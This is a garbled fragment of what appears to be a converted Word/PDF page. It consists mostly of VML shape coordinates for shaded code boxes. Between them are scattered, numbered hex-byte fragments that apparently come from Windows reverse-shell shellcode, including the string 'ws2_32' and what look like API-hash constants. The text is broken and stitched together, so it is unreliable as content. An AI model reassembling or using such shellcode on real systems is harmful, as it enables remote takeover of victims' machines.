7,13372,1517,13381,1517,13389,1517,13398,1517,13407,1517,13417,1517,13426,1517,13436,1517,13446,1517,13457,1517,13467,1517,13478,1517,13489,1517,13500,1517,13511,1517,13523,1517,13534,1517,13546,1517,13559,1517,13571,1517,13584,1517,13597,1517,13610,1517,13623,1517,13637,1517,13651,1517,13665,1517,13680,1517,13694,1517,13709,1517,13725,1517,13740,1517,13756e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:686.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13730" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:13730;width:8990;height:670" coordorigin="1490,13730" coordsize="8990,670" path="m1510,13756l1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1511,13756,1512,13756,1512,13756,1514,13756,1515,13756,1517,13756,1519,13756,1521,13756,1524,13756,1528,13756,1532,13756,1536,13756,1541,13756,1546,13756,1552,13756,1559,13756,1566,13756,1575,13756,1583,13756,1593,13756,1603,13756,1615,13756,1627,13756,1640,13756,1654,13756,1668,13756,1684,13756,1701,13756,1719,13756,1738,13756,1758,13756,1780,13756,1802,13756,1826,13756,1851,13756,1877,13756,1904,13756,1933,13756,1963,13756,1995,13756,2028,13756,2063,13756,2099,13756,2136,13756,2175,13756,2216,13756,2259,13756,2303,13756,2348,13756,2396,13756,2445,13756,2496,13756,2549,13756,2604,13756,2660,13756,2719,13756,2779,13756,2841,13756,2906,13756,2972,13756,3041,13756,3112,13756,3184,13756,3259,13756,3336,13756,3416,13756,3498,13756,3582,13756,3668,13756,3757,13756,3848,13756,3941,13756,4037,13756,4136,13756,4236,13756,4340,13756,4446,13756,4555,13756,4666,13756,4780,13756,4897,13756,5017,13756,5139,13756,5264,13756,5392,13756,5523,13756,5657,13756,5793,13756,5933,13756,6076,13756,6222,13756,6370,13756,6522,13756,6677,13756,6835,13756,6997,13756,7161,13756,7329,13756,7500,13756,7675,13756,7853,13756,8034,13756,8219,13756,8407,13756,8598,13756,8793,13756,8992,13756,9194,13756,9400,13756,9609,13756,9823,13756,10039,13756,10260,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13757,10484,13757,10484,13757,10484,13757,10484,13757,10484,13758,10484,13758,10484,13759,10484,13759,10484,13759,10484,13760,10484,13761,10484,13761,10484,13762,10484,13763,10484,13763,10484,13764,10484,13765,10484,13766,10484,13767,10484,13768,10484,13770,10484,13771,10484,13772,10484,13774,10484,13775,10484,13777,10484,13779,10484,13780,10484,13782,10484,13784,10484,13786,10484,13789,10484,13791,10484,13793,10484,13796,10484,13798,10484,13801,10484,13804,10484,13807,10484,13810,10484,13813,10484,13816,10484,13820,10484,13823,10484,13827,10484,13831,10484,13835,10484,13839,10484,13843,10484,13847,10484,13852,10484,13856,10484,13861,10484,13866,10484,13871,10484,13876,10484,13882,10484,13887,10484,13893,10484,13899,10484,13905,10484,13911,10484,13917,10484,13924,10484,13931,10484,13938,10484,13945,10484,13952,10484,13959,10484,13967,10484,13975,10484,13983,10484,13991,10484,14000,10484,14008,10484,14017,10484,14026,10484,14035,10484,14045,10484,14054,10484,14064,10484,14074,10484,14084,10484,14095,10484,14105,10484,14116,10484,14128,10484,14139,10484,14150,10484,14162,10484,14174,10484,14187,10484,14199,10484,14212,10484,14225,10484,14238,10484,14252,10484,14266,10484,14280,10484,14294,10484,14308,10484,14323,10484,14338,10484,14354,10484,14369,10484,14385,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10483,14401,10482,14401,10482,14401,10480,14401,10479,14401,10477,14401,10475,14401,10473,14401,10470,14401,10466,14401,10462,14401,10458,14401,10453,14401,10448,14401,10442,14401,10435,14401,10428,14401,10419,14401,10411,14401,10401,14401,10391,14401,10379,14401,10367,14401,10354,14401,10340,14401,10326,14401,10310,14401,10293,14401,10275,14401,10256,14401,10236,14401,10215,14401,10192,14401,10168,14401,10143,14401,10117,14401,10090,14401,10061,14401,10031,14401,9999,14401,9966,14401,9931,14401,9895,14401,9858,14401,9819,14401,9778,14401,9735,14401,9691,14401,9646,14401,9598,14401,9549,14401,9498,14401,9445,14401,9391,14401,9334,14401,9275,14401,9215,14401,9153,14401,9088,14401,9022,14401,8953,14401,8883,14401,8810,14401,8735,14401,8658,14401,8578,14401,8497,14401,8413,14401,8326,14401,8238,14401,8146,14401,8053,14401,7957,14401,7859,14401,7758,14401,7654,14401,7548,14401,7439,14401,7328,14401,7214,14401,7097,14401,6977,14401,6855,14401,6730,14401,6602,14401,6471,14401,6337,14401,6201,14401,6061,14401,5918,14401,5773,14401,5624,14401,5472,14401,5317,14401,5159,14401,4997,14401,4833,14401,4665,14401,4494,14401,4319,14401,4141,14401,3960,14401,3776,14401,3587,14401,3396,14401,3201,14401,3002,14401,2800,14401,2594,14401,2385,14401,2172,14401,1955,14401,1734,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14400,1510,14400,1510,14400,1510,14400,1510,14399,1510,14399,1510,14399,1510,14398,1510,14398,1510,14397,1510,14397,1510,14396,1510,14395,1510,14395,1510,14394,1510,14393,1510,14392,1510,14391,1510,14390,1510,14389,1510,14387,1510,14386,1510,14385,1510,14383,1510,14382,1510,14380,1510,14379,1510,14377,1510,14375,1510,14373,1510,14371,1510,14369,1510,14366,1510,14364,1510,14361,1510,14359,1510,14356,1510,14353,1510,14350,1510,14347,1510,14344,1510,14341,1510,14338,1510,14334,1510,14330,1510,14327,1510,14323,1510,14319,1510,14314,1510,14310,1510,14306,1510,14301,1510,14296,1510,14291,1510,14286,1510,14281,1510,14275,1510,14270,1510,14264,1510,14258,1510,14252,1510,14246,1510,14240,1510,14233,1510,14226,1510,14220,1510,14212,1510,14205,1510,14198,1510,14190,1510,14182,1510,14174,1510,14166,1510,14158,1510,14149,1510,14140,1510,14131,1510,14122,1510,14113,1510,14103,1510,14093,1510,14083,1510,14073,1510,14062,1510,14052,1510,14041,1510,14030,1510,14018,1510,14007,1510,13995,1510,13983,1510,13970,1510,13958,1510,13945,1510,13932,1510,13919,1510,13905,1510,13892,1510,13878,1510,13863,1510,13849,1510,13834,1510,13819,1510,13804,1510,13788,1510,13772,1510,13756e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:687.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13750" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:13750;width:30;height:650" coordorigin="1490,13750" coordsize="30,650" path="m1517,13756l1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13757,1517,13757,1517,13757,1517,13757,1517,13757,1517,13758,1517,13758,1517,13759,1517,13759,1517,13759,1517,13760,1517,13761,1517,13761,1517,13762,1517,13763,1517,13763,1517,13764,1517,13765,1517,13766,1517,13767,1517,13768,1517,13770,1517,13771,1517,13772,1517,13774,1517,13775,1517,13777,1517,13779,1517,13780,1517,13782,1517,13784,1517,13786,1517,13789,1517,13791,1517,13793,1517,13796,1517,13798,1517,13801,1517,13804,1517,13807,1517,13810,1517,13813,1517,13816,1517,13820,1517,13823,1517,13827,1517,13831,1517,13835,1517,13839,1517,13843,1517,13847,1517,13852,1517,13856,1517,13861,1517,13866,1517,13871,1517,13876,1517,13882,1517,13887,1517,13893,1517,13899,1517,13905,1517,13911,1517,13917,1517,13924,1517,13931,1517,13938,1517,13945,1517,13952,1517,13959,1517,13967,1517,13975,1517,13983,1517,13991,1517,14000,1517,14008,1517,14017,1517,14026,1517,14035,1517,14045,1517,14054,1517,14064,1517,14074,1517,14084,1517,14095,1517,14105,1517,14116,1517,14128,1517,14139,1517,14150,1517,14162,1517,14174,1517,14187,1517,14199,1517,14212,1517,14225,1517,14238,1517,14252,1517,14266,1517,14280,1517,14294,1517,14308,1517,14323,1517,14338,1517,14354,1517,14369,1517,14385,1517,14401e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:719.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14390" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:14390;width:8990;height:630" coordorigin="1490,14390" coordsize="8990,630" path="m1510,14401l1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1511,14401,1512,14401,1512,14401,1514,14401,1515,14401,1517,14401,1519,14401,1521,14401,1524,14401,1528,14401,1532,14401,1536,14401,1541,14401,1546,14401,1552,14401,1559,14401,1566,14401,1575,14401,1583,14401,1593,14401,1603,14401,1615,14401,1627,14401,1640,14401,1654,14401,1668,14401,1684,14401,1701,14401,1719,14401,1738,14401,1758,14401,1780,14401,1802,14401,1826,14401,1851,14401,1877,14401,1904,14401,1933,14401,1963,14401,1995,14401,2028,14401,2063,14401,2099,14401,2136,14401,2175,14401,2216,14401,2259,14401,2303,14401,2348,14401,2396,14401,2445,14401,2496,14401,2549,14401,2604,14401,2660,14401,2719,14401,2779,14401,2841,14401,2906,14401,2972,14401,3041,14401,3112,14401,3184,14401,3259,14401,3336,14401,3416,14401,3498,14401,3582,14401,3668,14401,3757,14401,3848,14401,3941,14401,4037,14401,4136,14401,4236,14401,4340,14401,4446,14401,4555,14401,4666,14401,4780,14401,4897,14401,5017,14401,5139,14401,5264,14401,5392,14401,5523,14401,5657,14401,5793,14401,5933,14401,6076,14401,6222,14401,6370,14401,6522,14401,6677,14401,6835,14401,6997,14401,7161,14401,7329,14401,7500,14401,7675,14401,7853,14401,8034,14401,8219,14401,8407,14401,8598,14401,8793,14401,8992,14401,9194,14401,9400,14401,9609,14401,9823,14401,10039,14401,10260,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14402,10484,14402,10484,14402,10484,14402,10484,14402,10484,14402,10484,14403,10484,14403,10484,14403,10484,14403,10484,14404,10484,14404,10484,14405,10484,14405,10484,14406,10484,14406,10484,14407,10484,14408,10484,14409,10484,14409,10484,14410,10484,14411,10484,14412,10484,14414,10484,14415,10484,14416,10484,14417,10484,14419,10484,14420,10484,14422,10484,14423,10484,14425,10484,14427,10484,14429,10484,14431,10484,14433,10484,14435,10484,14438,10484,14440,10484,14443,10484,14445,10484,14448,10484,14451,10484,14454,10484,14457,10484,14460,10484,14463,10484,14467,10484,14471,10484,14474,10484,14478,10484,14482,10484,14486,10484,14490,10484,14495,10484,14499,10484,14504,10484,14509,10484,14514,10484,14519,10484,14524,10484,14530,10484,14535,10484,14541,10484,14547,10484,14553,10484,14559,10484,14565,10484,14572,10484,14579,10484,14586,10484,14593,10484,14600,10484,14607,10484,14615,10484,14623,10484,14631,10484,14639,10484,14648,10484,14656,10484,14665,10484,14674,10484,14683,10484,14693,10484,14702,10484,14712,10484,14722,10484,14732,10484,14743,10484,14753,10484,14764,10484,14775,10484,14787,10484,14798,10484,14810,10484,14822,10484,14834,10484,14847,10484,14859,10484,14872,10484,14886,10484,14899,10484,14913,10484,14927,10484,14941,10484,14955,10484,14970,10484,14985,10484,15000,10484,15016,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10483,15032,10482,15032,10482,15032,10480,15032,10479,15032,10477,15032,10475,15032,10473,15032,10470,15032,10466,15032,10462,15032,10458,15032,10453,15032,10448,15032,10442,15032,10435,15032,10428,15032,10419,15032,10411,15032,10401,15032,10391,15032,10379,15032,10367,15032,10354,15032,10340,15032,10326,15032,10310,15032,10293,15032,10275,15032,10256,15032,10236,15032,10215,15032,10192,15032,10168,15032,10143,15032,10117,15032,10090,15032,10061,15032,10031,15032,9999,15032,9966,15032,9931,15032,9895,15032,9858,15032,9819,15032,9778,15032,9735,15032,9691,15032,9646,15032,9598,15032,9549,15032,9498,15032,9445,15032,9391,15032,9334,15032,9275,15032,9215,15032,9153,15032,9088,15032,9022,15032,8953,15032,8883,15032,8810,15032,8735,15032,8658,15032,8578,15032,8497,15032,8413,15032,8326,15032,8238,15032,8146,15032,8053,15032,7957,15032,7859,15032,7758,15032,7654,15032,7548,15032,7439,15032,7328,15032,7214,15032,7097,15032,6977,15032,6855,15032,6730,15032,6602,15032,6471,15032,6337,15032,6201,15032,6061,15032,5918,15032,5773,15032,5624,15032,5472,15032,5317,15032,5159,15032,4997,15032,4833,15032,4665,15032,4494,15032,4319,15032,4141,15032,3960,15032,3776,15032,3587,15032,3396,15032,3201,15032,3002,15032,2800,15032,2594,15032,2385,15032,2172,15032,1955,15032,1734,15032,1510,15032,1510,15032,1510,15032,1510,15032,1510,15032,1510,15032,1510,15032,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15030,1510,15030,1510,15030,1510,15029,1510,15029,1510,15029,1510,15028,1510,15028,1510,15027,1510,15026,1510,15026,1510,15025,1510,15024,1510,15023,1510,15022,1510,15021,1510,15020,1510,15019,1510,15018,1510,15017,1510,15016,1510,15014,1510,15013,1510,15011,1510,15009,1510,15008,1510,15006,1510,15004,1510,15002,1510,15000,1510,14997,1510,14995,1510,14993,1510,14990,1510,14988,1510,14985,1510,14982,1510,14979,1510,14976,1510,14973,1510,14969,1510,14966,1510,14962,1510,14959,1510,14955,1510,14951,1510,14947,1510,14942,1510,14938,1510,14934,1510,14929,1510,14924,1510,14919,1510,14914,1510,14909,1510,14903,1510,14898,1510,14892,1510,14886,1510,14880,1510,14874,1510,14867,1510,14861,1510,14854,1510,14847,1510,14840,1510,14833,1510,14825,1510,14818,1510,14810,1510,14802,1510,14794,1510,14785,1510,14777,1510,14768,1510,14759,1510,14750,1510,14740,1510,14731,1510,14721,1510,14711,1510,14701,1510,14690,1510,14680,1510,14669,1510,14658,1510,14646,1510,14635,1510,14623,1510,14611,1510,14599,1510,14586,1510,14573,1510,14560,1510,14547,1510,14534,1510,14520,1510,14506,1510,14492,1510,14477,1510,14463,1510,14448,1510,14433,1510,14417,1510,14401e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:719.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14390" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:14390;width:30;height:630" coordorigin="1490,14390" coordsize="30,630" path="m1517,14401l1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14402,1517,14402,1517,14402,1517,14402,1517,14402,1517,14402,1517,14403,1517,14403,1517,14403,1517,14403,1517,14404,1517,14404,1517,14405,1517,14405,1517,14406,1517,14406,1517,14407,1517,14408,1517,14409,1517,14409,1517,14410,1517,14411,1517,14412,1517,14414,1517,14415,1517,14416,1517,14417,1517,14419,1517,14420,1517,14422,1517,14423,1517,14425,1517,14427,1517,14429,1517,14431,1517,14433,1517,14435,1517,14438,1517,14440,1517,14443,1517,14445,1517,14448,1517,14451,1517,14454,1517,14457,1517,14460,1517,14463,1517,14467,1517,14471,1517,14474,1517,14478,1517,14482,1517,14486,1517,14490,1517,14495,1517,14499,1517,14504,1517,14509,1517,14514,1517,14519,1517,14524,1517,14530,1517,14535,1517,14541,1517,14547,1517,14553,1517,14559,1517,14565,1517,14572,1517,14579,1517,14586,1517,14593,1517,14600,1517,14607,1517,14615,1517,14623,1517,14631,1517,14639,1517,14648,1517,14656,1517,14665,1517,14674,1517,14683,1517,14693,1517,14702,1517,14712,1517,14722,1517,14732,1517,14743,1517,14753,1517,14764,1517,14775,1517,14787,1517,14798,1517,14810,1517,14822,1517,14834,1517,14847,1517,14859,1517,14872,1517,14886,1517,14899,1517,14913,1517,14927,1517,14941,1517,14955,1517,14970,1517,14985,1517,15000,1517,15016,1517,15032e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:750.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:15010;width:8990;height:650" coordorigin="1490,15010" coordsize="8990,650" path="m1510,15032l1510,15032,1510,15032,1510,15032,1510,15032,1510,15032,1510,15032,1511,15032,1512,15032,1512,15032,1514,15032,1515,15032,1517,15032,1519,15032,1521,15032,1524,15032,1528,15032,1532,15032,1536,15032,1541,15032,1546,15032,1552,15032,1559,15032,1566,15032,1575,15032,1583,15032,1593,15032,1603,15032,1615,15032,1627,15032,1640,15032,1654,15032,1668,15032,1684,15032,1701,15032,1719,15032,1738,15032,1758,15032,1780,15032,1802,15032,1826,15032,1851,15032,1877,15032,1904,15032,1933,15032,1963,15032,1995,15032,2028,15032,2063,15032,2099,15032,2136,15032,2175,15032,2216,15032,2259,15032,2303,15032,2348,15032,2396,15032,2445,15032,2496,15032,2549,15032,2604,15032,2660,15032,2719,15032,2779,15032,2841,15032,2906,15032,2972,15032,3041,15032,3112,15032,3184,15032,3259,15032,3336,15032,3416,15032,3498,15032,3582,15032,3668,15032,3757,15032,3848,15032,3941,15032,4037,15032,4136,15032,4236,15032,4340,15032,4446,15032,4555,15032,4666,15032,4780,15032,4897,15032,5017,15032,5139,15032,5264,15032,5392,15032,5523,15032,5657,15032,5793,15032,5933,15032,6076,15032,6222,15032,6370,15032,6522,15032,6677,15032,6835,15032,6997,15032,7161,15032,7329,15032,7500,15032,7675,15032,7853,15032,8034,15032,8219,15032,8407,15032,8598,15032,8793,15032,8992,15032,9194,15032,9400,15032,9609,15032,9823,15032,10039,15032,10260,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15032,10484,15033,10484,15033,10484,15033,10484,15033,10484,15034,10484,15034,10484,15035,10484,15035,10484,15036,10484,15036,10484,15037,10484,15038,10484,15038,10484,15039,10484,15040,10484,15041,10484,15042,10484,15043,10484,15044,10484,15045,10484,15047,10484,15048,10484,15049,10484,15051,10484,15053,10484,15054,10484,15056,10484,15058,10484,15060,10484,15062,10484,15064,10484,15066,10484,15069,10484,15071,10484,15074,10484,15077,10484,15079,10484,15082,10484,15085,10484,15089,10484,15092,10484,15095,10484,15099,10484,15102,10484,15106,10484,15110,10484,15114,10484,15118,10484,15123,10484,15127,10484,15132,10484,15137,10484,15142,10484,15147,10484,15152,10484,15157,10484,15163,10484,15169,10484,15175,10484,15181,10484,15187,10484,15193,10484,15200,10484,15206,10484,15213,10484,15220,10484,15228,10484,15235,10484,15243,10484,15251,10484,15259,10484,15267,10484,15275,10484,15284,10484,15293,10484,15302,10484,15311,10484,15320,10484,15330,10484,15340,10484,15350,10484,15360,10484,15370,10484,15381,10484,15392,10484,15403,10484,15415,10484,15426,10484,15438,10484,15450,10484,15462,10484,15475,10484,15488,10484,15501,10484,15514,10484,15528,10484,15541,10484,15555,10484,15570,10484,15584,10484,15599,10484,15614,10484,15629,10484,15645,10484,15661,10484,15677,10484,15677,10484,15677,10484,15677,10484,15677,10484,15677,10484,15677,10483,15677,10482,15677,10482,15677,10480,15677,10479,15677,10477,15677,10475,15677,10473,15677,10470,15677,10466,15677,10462,15677,10458,15677,10453,15677,10448,15677,10442,15677,10435,15677,10428,15677,10419,15677,10411,15677,10401,15677,10391,15677,10379,15677,10367,15677,10354,15677,10340,15677,10326,15677,10310,15677,10293,15677,10275,15677,10256,15677,10236,15677,10215,15677,10192,15677,10168,15677,10143,15677,10117,15677,10090,15677,10061,15677,10031,15677,9999,15677,9966,15677,9931,15677,9895,15677,9858,15677,9819,15677,9778,15677,9735,15677,9691,15677,9646,15677,9598,15677,9549,15677,9498,15677,9445,15677,9391,15677,9334,15677,9275,15677,9215,15677,9153,15677,9088,15677,9022,15677,8953,15677,8883,15677,8810,15677,8735,15677,8658,15677,8578,15677,8497,15677,8413,15677,8326,15677,8238,15677,8146,15677,8053,15677,7957,15677,7859,15677,7758,15677,7654,15677,7548,15677,7439,15677,7328,15677,7214,15677,7097,15677,6977,15677,6855,15677,6730,15677,6602,15677,6471,15677,6337,15677,6201,15677,6061,15677,5918,15677,5773,15677,5624,15677,5472,15677,5317,15677,5159,15677,4997,15677,4833,15677,4665,15677,4494,15677,4319,15677,4141,15677,3960,15677,3776,15677,3587,15677,3396,15677,3201,15677,3002,15677,2800,15677,2594,15677,2385,15677,2172,15677,1955,15677,1734,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15677,1510,15676,1510,15676,1510,15676,1510,15676,1510,15676,1510,15675,1510,15675,1510,15675,1510,15674,1510,15674,1510,15673,1510,15673,1510,15672,1510,15672,1510,15671,1510,15670,1510,15669,1510,15668,1510,15668,1510,15667,1510,15665,1510,15664,1510,15663,1510,15662,1510,15660,1510,15659,1510,15658,1510,15656,1510,15654,1510,15652,1510,15651,1510,15649,1510,15646,1510,15644,1510,15642,1510,15640,1510,15637,1510,15635,1510,15632,1510,15629,1510,15626,1510,15623,1510,15620,1510,15617,1510,15613,1510,15610,1510,15606,1510,15602,1510,15598,1510,15594,1510,15590,1510,15586,1510,15581,1510,15577,1510,15572,1510,15567,1510,15562,1510,15556,1510,15551,1510,15546,1510,15540,1510,15534,1510,15528,1510,15522,1510,15515,1510,15509,1510,15502,1510,15495,1510,15488,1510,15481,1510,15473,1510,15466,1510,15458,1510,15450,1510,15442,1510,15433,1510,15425,1510,15416,1510,15407,1510,15398,1510,15388,1510,15379,1510,15369,1510,15359,1510,15349,1510,15338,1510,15327,1510,15316,1510,15305,1510,15294,1510,15282,1510,15271,1510,15258,1510,15246,1510,15234,1510,15221,1510,15208,1510,15194,1510,15181,1510,15167,1510,15153,1510,15139,1510,15124,1510,15110,1510,15094,1510,15079,1510,15064,1510,15048,1510,15032e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:750.500pt;width:1.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="30,670">
        <v:shape style="position:absolute;left:1490;top:15010;width:30;height:670" coordorigin="1490,15010" coordsize="30,670" path="m1517,15032l1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15033,1517,15033,1517,15033,1517,15033,1517,15034,1517,15034,1517,15035,1517,15035,1517,15036,1517,15036,1517,15037,1517,15038,1517,15038,1517,15039,1517,15040,1517,15041,1517,15042,1517,15043,1517,15044,1517,15045,1517,15047,1517,15048,1517,15049,1517,15051,1517,15053,1517,15054,1517,15056,1517,15058,1517,15060,1517,15062,1517,15064,1517,15066,1517,15069,1517,15071,1517,15074,1517,15077,1517,15079,1517,15082,1517,15085,1517,15089,1517,15092,1517,15095,1517,15099,1517,15102,1517,15106,1517,15110,1517,15114,1517,15118,1517,15123,1517,15127,1517,15132,1517,15137,1517,15142,1517,15147,1517,15152,1517,15157,1517,15163,1517,15169,1517,15175,1517,15181,1517,15187,1517,15193,1517,15200,1517,15206,1517,15213,1517,15220,1517,15228,1517,15235,1517,15243,1517,15251,1517,15259,1517,15267,1517,15275,1517,15284,1517,15293,1517,15302,1517,15311,1517,15320,1517,15330,1517,15340,1517,15350,1517,15360,1517,15370,1517,15381,1517,15392,1517,15403,1517,15415,1517,15426,1517,15438,1517,15450,1517,15462,1517,15475,1517,15488,1517,15501,1517,15514,1517,15528,1517,15541,1517,15555,1517,15570,1517,15584,1517,15599,1517,15614,1517,15629,1517,15645,1517,15661,1517,15677e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb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86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49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0x39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0x75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0x44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0x24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0x49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0xd0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0x66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x8b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50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0x44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0x1c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0x04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x01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51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0x58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0x5e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0x5a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0x58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0x59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x48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52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0xec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0x20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0xe0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0x58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0x59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0x12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xe9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53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0x49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0xbe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0x77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0x73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0x32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0x33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0x32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x00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54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0x49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0xe6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0xec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0xa0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xe5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55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0xbc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0x02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0x35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0xa8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0x04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0x54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xe4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56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0xf1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0xba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0x4c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0x77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0x26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0x4c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0xea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x68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57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0xba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0x29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0x6b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0x6a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x0a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58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0x50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0x31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0x4d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0x31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0xc0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x89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59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0xba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0xea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0xdf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0xe0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xd5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60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0xc7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0x6a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0x10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0x4c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0xe2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xba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61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0x99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0xa5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0x74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0x61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0xd5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0xc0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0x74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0x0a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0x75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xe5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62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0xe8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0x93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0xec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0x10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0xe2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0x31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xc9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63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0x6a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0xba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0x02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0xc8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xd5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64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0x7e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0xc4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0x20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0x5e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0xf6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0x6a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x41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65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0x68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0x10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0x58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0x31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x41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66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0xba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0xa4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0xe5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0xc3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x31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67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0xf9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0xba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xc8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68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0xd5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0x7d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0x28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0x59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0x68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x40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69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0x6a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0xba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0x0b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0x2f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0x0f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0x30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xd5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70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0xba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0x75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0x6e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0x61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0xd5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0xe9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x3c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71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0xc3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0x29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0xf6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0x75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0xb4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x41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20.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,